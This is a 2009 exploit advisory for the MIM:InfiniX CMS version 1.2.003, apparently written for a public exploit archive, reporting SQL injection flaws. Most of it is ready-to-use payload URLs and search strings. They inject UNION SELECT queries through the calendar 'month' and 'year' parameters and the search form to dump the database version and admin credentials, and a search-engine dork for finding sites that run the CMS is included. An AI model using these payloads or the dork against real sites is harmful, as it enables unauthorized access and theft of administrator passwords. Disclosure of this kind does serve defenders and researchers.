-------------------------------------------------------------------------- MULTIPLE REMOTE SQL INJECTION VULNERABILITIES --MIM:InfiniX v1.2.003--> -------------------------------------------------------------------------- CMS INFORMATION: -->WEB: http://mim.infinix.it -->DOWNLOAD: https://sourceforge.net/projects/infinix/ -->DEMO: http://mim.infinix.it -->CATEGORY: CMS / Portal -->DESCRIPTION: MIM:InfiniX Manuale Intermediale della Modernita': Infinite Info... in Xml PHP-XHTML-XML-XSL-CSS-AJAX-RDF. Design your CMS and store... -->RELEASED: 2009-04-21 CMS VULNERABILITY: -->TESTED ON: firefox 3 -->DORK: "Developed by rbk" -->CATEGORY: MULTIPLE SQL INJECTION VULNERABILITIES -->AFFECT VERSION: 1.2.003 (maybe <= ?) -->Discovered Bug date: 2009-04-27 -->Reported Bug date: 2009-04-27 -->Fixed bug date: 2009-04-28 -->Info patch: v1.2.003 -->Author: YEnH4ckEr -->mail: y3nh4ck3r[at]gmail[dot]com -->WEB/BLOG: N/A -->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. -->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) ######################### //////////////////////// SQL INJECTION (SQLi): //////////////////////// ######################### <<<<---------++++++++++++++ Condition: magic_quotes_gpc=off +++++++++++++++++--------->>>> ------- INTRO: ------- Admin choose to use database or not. This CMS is completely vulnerable to SQL Injection (I only show some vars). ------------------ PROOF OF CONCEPT: ------------------ For example ("month" and "year" GET vars). Links: http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5&year=2009%27+AND+0+UNION+ALL+SELECT+1,version(),database(),4,5,6/* http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5%27+AND+0+UNION+ALL+SELECT+1,version(),database(),4,5,6/*&year=2009 Another example (search post form). Search this: anything%')) union all select 1,database(),version(),user(),5,6,7,8,9,database(),11# ---------- EXPLOITS: ---------- We get the admin credentials: http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5&year=2009%27+AND+0+UNION+ALL+SELECT+1,user,pass,4,5,6 FROM admin WHERE id=1/* http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5%27+AND+0+UNION+ALL+SELECT+1,user,pass,4,5,6+FROM+admin+WHERE+id=1/*&year=2009 anything%')) union all select 1,database(),database(),concat(user,'--::--',pass),5,6,7,8,9,database(),11 FROM admin WHERE id=1# ####################################################################### ####################################################################### ##*******************************************************************## ## ESPECIAL GREETZ TO: Str0ke, JosS, ... ## ##*******************************************************************## ##-------------------------------------------------------------------## ##*******************************************************************## ## GREETZ TO: SPANISH H4ck3Rs community! ## ##*******************************************************************## ####################################################################### #######################################################################